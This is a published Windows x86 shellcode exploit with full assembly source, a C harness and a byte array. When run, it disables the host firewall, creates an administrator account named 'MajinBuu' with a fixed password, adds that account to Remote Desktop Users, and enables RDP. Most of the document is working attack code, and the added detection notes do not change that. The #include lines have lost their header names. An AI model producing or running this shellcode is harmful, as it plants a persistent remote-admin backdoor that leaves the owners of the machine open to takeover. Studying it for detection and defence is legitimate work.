## Exploit Title: Windows/x86 - MSVCRT System - Dynamic Null-free - Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
## Exploit Author: Bobby Cooke
## Date: 2020-04-20
## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service.
## Commands used:
## 'netsh firewall set opmode mode=DISABLE'
## 'net user MajinBuu TurnU2C@ndy!! /add'
## 'net localgroup Administrators MajinBuu /add'
## 'net localgroup "Remote Desktop Users" MajinBuu /add'
## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

; ---------------------------------------------------------------------------
; Reader's guide
;
; Layout: NASM-style 32-bit x86 source first, then (below the '#' divider) a C
; harness whose `code[]` array holds the assembled bytes of the same listing.
;
; Flow: locate kernel32.dll through the PEB loader list, parse its export
; table to find GetProcAddress, use that to resolve LoadLibraryA, load
; msvcrt.dll, resolve system(), then call system() five times with command
; strings built on the stack.
;
; Stack-frame slots used throughout:
;   [ebp-0x04] kernel32.dll base      [ebp-0x18] pointer to "GetProcAddress"
;   [ebp-0x08] &NamePointerTable      [ebp-0x1C] &GetProcAddress
;   [ebp-0x0C] &OrdinalTable          [ebp-0x20] &LoadLibraryA
;   [ebp-0x10] &AddressTable          [ebp-0x24] msvcrt.dll base
;   [ebp-0x14] Number of Functions    [ebp-0x28] &system
;
; What a defender can look for, taken from the commands listed above:
;   - the five command lines themselves; system() hands each one to the
;     command interpreter, so they surface as child processes of the affected
;     process in process-creation telemetry (Security event 4688 with command
;     line auditing, or Sysmon event 1);
;   - a new local account (Security event 4720) followed by additions to the
;     local Administrators and Remote Desktop Users groups (event 4732);
;   - fDenyTSConnections set to 0 under
;     HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server;
;   - use of the legacy `netsh firewall set opmode` syntax to turn the host
;     firewall off.
; ---------------------------------------------------------------------------

; Create stack frame
    mov ebp, esp
    sub esp, 0x30                 ; reserve 0x30 bytes for the slots listed above

; Find kernel32.dll base address
    xor ebx, ebx
    mov ebx, [fs:ebx+0x30]        ; EBX = Address_of_PEB
    mov ebx, [ebx+0xC]            ; EBX = Address_of_LDR
    mov ebx, [ebx+0x1C]           ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
    mov ebx, [ebx]                ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
    mov ebx, [ebx]                ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
                                  ; NOTE(review): the module order is the author's assumption for the
                                  ; builds named in "Tested on"; nothing here verifies the module name.
    mov eax, [ebx+0x8]            ; EAX = &kernel32.dll / Address of kernel32.dll
    mov [ebp-0x4], eax            ; [EBP-0x04] = &kernel32.dll

; Find the address of the Export Table within kernel32.dll
    mov ebx, [eax+0x3C]           ; EBX = Offset NewEXEHeader
    add ebx, eax                  ; EBX = &NewEXEHeader
    mov ebx, [ebx+0x78]           ; EBX = RVA ExportTable
    add ebx, eax                  ; EBX = &ExportTable

; Find the address of the Name Pointer Table within kernel32.dll
    mov edi, [ebx+0x20]           ; EDI = RVA NamePointerTable
    add edi, eax                  ; EDI = &NamePointerTable
    mov [ebp-0x8], edi            ; save &NamePointerTable to stack frame

; Find the address of the Ordinal Table
    mov ecx, [ebx+0x24]           ; ECX = RVA OrdinalTable
    add ecx, eax                  ; ECX = &OrdinalTable
    mov [ebp-0xC], ecx            ; save &OrdinalTable to stack-frame

; Find the address of the Address Table
    mov edx, [ebx+0x1C]           ; EDX = RVA AddressTable
    add edx, eax                  ; EDX = &AddressTable
    mov [ebp-0x10], edx           ; save &AddressTable to stack-frame

; Find Number of Functions within the Export Table of kernel32.dll
    mov edx, [ebx+0x14]           ; EDX = Number of Functions
    mov [ebp-0x14], edx           ; save value of Number of Functions to stack-frame

    jmp short functions           ; skip over the lookup subroutine below

; Subroutine: search the export names of kernel32.dll for the string whose
; address is in [ebp-0x18]; returns the resolved function address in EAX.
findFunctionAddr:
; Initialize the Counter to prevent infinite loop
    xor eax, eax                  ; EAX = Counter = 0
    mov edx, [ebp-0x14]           ; get value of Number of Functions from stack-frame
; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
searchLoop:
    mov edi, [ebp-0x8]            ; EDI = &NamePointerTable
    mov esi, [ebp-0x18]           ; ESI = Address of String for the Symbol we are searching for
    xor ecx, ecx                  ; ECX = 0x00000000
    cld                           ; clear direction flag - Process strings from left to right
    mov edi, [edi+eax*4]          ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
    add edi, [ebp-0x4]            ; EDI = &NameString = RVA NameString + &kernel32.dll
    add cx, 0xF                   ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
    repe cmpsb                    ; compare up to 15 bytes (ECX) of [&NameString] with "GetProcAddress",0x00
    jz found                      ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
    inc eax                       ; else Counter ++
    cmp eax, edx                  ; compare Counter with Number of Functions
    jb searchLoop                 ; If Counter < Number of Functions, then restart the loop

found:
; Find the address of GetProcAddress by using the last value of the Counter
    mov ecx, [ebp-0xC]            ; ECX = &OrdinalTable
    mov edx, [ebp-0x10]           ; EDX = &AddressTable
    mov ax, [ecx + eax*2]         ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
    mov eax, [edx + eax*4]        ; EAX = RVA GetProcAddress = [&AddressTable + (ordinalNumber*4)]
    add eax, [ebp-0x4]            ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll
    ret

functions:
# Push string "GetProcAddress",0x00 onto the stack
    xor eax, eax                  ; clear eax register
    mov ax, 0x7373                ; AX is the lower 16-bits of the 32bit EAX Register
                                  ; (loading only AX leaves the upper half zero, which supplies the
                                  ; string terminator without a zero byte in the instruction stream)
    push eax                      ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
    push 0x65726464               ; erdd : 65726464 // "GetProcAddress"
    push 0x41636f72               ; Acor : 41636f72
    push 0x50746547               ; PteG : 50746547
    mov [ebp-0x18], esp           ; save pointer to the string (current top of stack) in the frame
    call findFunctionAddr         ; After Return EAX will = &GetProcAddress
# EAX = &GetProcAddress
    mov [ebp-0x1C], eax           ; save &GetProcAddress

; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
    xor edx, edx                  ; EDX = 0x00000000
    push edx                      ; null terminator for LoadLibraryA string
    push 0x41797261               ; Ayra : 41797261 // "LoadLibraryA",0x00
    push 0x7262694c               ; rbiL : 7262694c
    push 0x64616f4c               ; daoL : 64616f4c
    push esp                      ; lpProcName -- pointer to the start of the string (2nd argument, pushed first)
    push dword [ebp-0x4]          ; hModule -- base address of kernel32.dll (1st argument)
    mov eax, [ebp-0x1C]           ; Move the address of GetProcAddress into the EAX register
    call eax                      ; Call the GetProcAddress Function.
    mov [ebp-0x20], eax           ; save Address of LoadLibraryA

; Call LoadLibraryA(PTR "msvcrt")
; push "msvcrt",0x00 to the stack and save pointer
    xor eax, eax                  ; clear eax
    mov ax, 0x7472                ; tr : 7472
    push eax
    push 0x6376736D               ; cvsm : 6376736D
    push esp                      ; push the pointer to the string
    mov ebx, [ebp-0x20]           ; LoadLibraryA Address to ebx register
    call ebx                      ; call the LoadLibraryA Function to load msvcrt.dll
    mov [ebp-0x24], eax           ; save Address of msvcrt.dll

; Call GetProcAddress(msvcrt.dll, "system")
    xor edx, edx
    mov dx, 0x6d65                ; me : 6d65
    push edx
    push 0x74737973               ; tsys : 74737973
    push esp                      ; push pointer to string to stack for 'system'
    push dword [ebp-0x24]         ; push base address of msvcrt.dll to stack
    mov eax, [ebp-0x1C]           ; PTR to GetProcAddress to EAX
    call eax                      ; GetProcAddress
                                  ; EAX = address of msvcrt system()
    mov [ebp-0x28], eax           ; save Address of msvcrt.system

; Each block below pushes one command string in reverse 4-byte chunks,
; passes its address to system(), and leaves the string on the stack.

; 'netsh firewall set opmode mode=DISABLE'
    xor ecx, ecx
    mov cx, 0x454c                ; EL : 454c
    push ecx
    push 0x42415349               ; BASI : 42415349
    push 0x443d6564               ; D=ed : 443d6564
    push 0x6f6d2065               ; om e : 6f6d2065
    push 0x646f6d70               ; domp : 646f6d70
    push 0x6f207465               ; o te : 6f207465
    push 0x73206c6c               ; s ll : 73206c6c
    push 0x61776572               ; awer : 61776572
    push 0x69662068               ; if h : 69662068
    push 0x7374656e               ; sten : 7374656e
    push esp                      ; push pointer to string
    mov eax, [ebp-0x28]           ; msvcrt.system address
    call eax                      ; call system

; 'net user MajinBuu TurnU2C@ndy!! /add'
    xor ecx, ecx
    push ecx
    push 0x6464612f               ; dda/ : 6464612f
    push 0x20212179               ; !!y : 20212179
    push 0x646e4043               ; dn@C : 646e4043
    push 0x32556e72               ; 2Unr : 32556e72
    push 0x75542075               ; uT u : 75542075
    push 0x75426e69               ; uBni : 75426e69
    push 0x6a614d20               ; jaM : 6a614d20
    push 0x72657375               ; resu : 72657375
    push 0x2074656e               ; ten : 2074656e
    push esp                      ; push pointer to string
    mov eax, [ebp-0x28]           ; msvcrt.system address
    call eax                      ; call system

; 'net localgroup Administrators MajinBuu /add'
    xor ecx, ecx
    push ecx
    mov ecx, 0x64646190           ; dda : 646461
    shr ecx, 8                    ; ECX = 0x00646461 ("add",0x00); the 0x90 filler byte is shifted out
    push ecx
    push 0x2f207575               ; / uu : 2f207575
    push 0x426e696a               ; Bnij : 426e696a
    push 0x614d2073               ; aM s : 614d2073
    push 0x726f7461               ; rota : 726f7461
    push 0x72747369               ; rtsi : 72747369
    push 0x6e696d64               ; nimd : 6e696d64
    push 0x41207075               ; A pu : 41207075
    push 0x6f72676c               ; orgl : 6f72676c
    push 0x61636f6c               ; acol : 61636f6c
    push 0x2074656e               ; ten : 2074656e
    push esp                      ; push pointer to string
    mov eax, [ebp-0x28]           ; msvcrt.system address
    call eax                      ; call system

; 'net localgroup "Remote Desktop Users" MajinBuu /add'
    xor ecx, ecx
    push ecx
    mov ecx, 0x64646190           ; dda : 646461
    shr ecx, 8                    ; ECX = 0x00646461 ("add",0x00), same construction as above
    push ecx
    push 0x2f207575               ; / uu : 2f207575
    push 0x426e696a               ; Bnij : 426e696a
    push 0x614d2022               ; aM " : 614d2022
    push 0x73726573               ; sres : 73726573
    push 0x5520706f               ; U po : 5520706f
    push 0x746b7365               ; tkse : 746b7365
    push 0x44206574               ; D et : 44206574
    push 0x6f6d6552               ; omeR : 6f6d6552
    push 0x22207075               ; " pu : 22207075
    push 0x6f72676c               ; orgl : 6f72676c
    push 0x61636f6c               ; acol : 61636f6c
    push 0x2074656e               ; ten : 2074656e
    push esp                      ; push pointer to string
    mov eax, [ebp-0x28]           ; msvcrt.system address
    call eax                      ; call system

; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
    xor ecx, ecx
    push ecx
    push 0x662f2030               ; f/ 0 : 662f2030
    push 0x20642f20               ; d/ : 20642f20
    push 0x44524f57               ; DROW : 44524f57
    push 0x445f4745               ; D_GE : 445f4745
    push 0x5220742f               ; R t/ : 5220742f
    push 0x20736e6f               ; sno : 20736e6f
    push 0x69746365               ; itce : 69746365
    push 0x6e6e6f43               ; nnoC : 6e6e6f43
    push 0x5354796e               ; STyn : 5354796e
    push 0x65446620               ; eDf : 65446620
    push 0x762f2022               ; v/ " : 762f2022
    push 0x72657672               ; revr : 72657672
    push 0x6553206c               ; eS l : 6553206c
    push 0x616e696d               ; anim : 616e696d
    push 0x7265545c               ; reT\ : 7265545c
    push 0x6c6f7274               ; lort : 6c6f7274
    push 0x6e6f435c               ; noC\ : 6e6f435c
    push 0x7465536c               ; teSl : 7465536c
    push 0x6f72746e               ; ortn : 6f72746e
    push 0x6f43746e               ; oCtn : 6f43746e
    push 0x65727275               ; erru : 65727275
    push 0x435c4d45               ; C\ME : 435c4d45
    push 0x54535953               ; TSYS : 54535953
    push 0x5c454e49               ; \ENI : 5c454e49
    push 0x4843414d               ; HCAM : 4843414d
    push 0x5f4c4143               ; _LAC : 5f4c4143
    push 0x4f4c5f59               ; OL_Y : 4f4c5f59
    push 0x454b4822               ; EKH" : 454b4822
    push 0x20646461               ; dda : 20646461
    push 0x20676572               ; ger : 20676572
    push esp                      ; push pointer to string
    mov eax, [ebp-0x28]           ; msvcrt.system address
    call eax                      ; call system

######################################################################################

/* C harness: the assembled bytes of the listing above, plus a main() that
 * jumps into them. */

/* NOTE(review): both header names after #include are missing in this copy of
 * the page (most likely stripped as markup); they cannot be recovered from
 * the text shown here. */
#include
#include

/* Assembled form of the listing above, split across adjacent string literals. */
char code[] = \
"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";

/* Entry point of the harness; argc and argv are not used. */
int main(int argc, char **argv)
{
    int (*func)();              /* function pointer that will alias the byte array */
    func = (int(*)()) code;     /* reinterpret the address of code[] as a function */
    (int)(*func)();             /* call into the bytes; the result is discarded */
}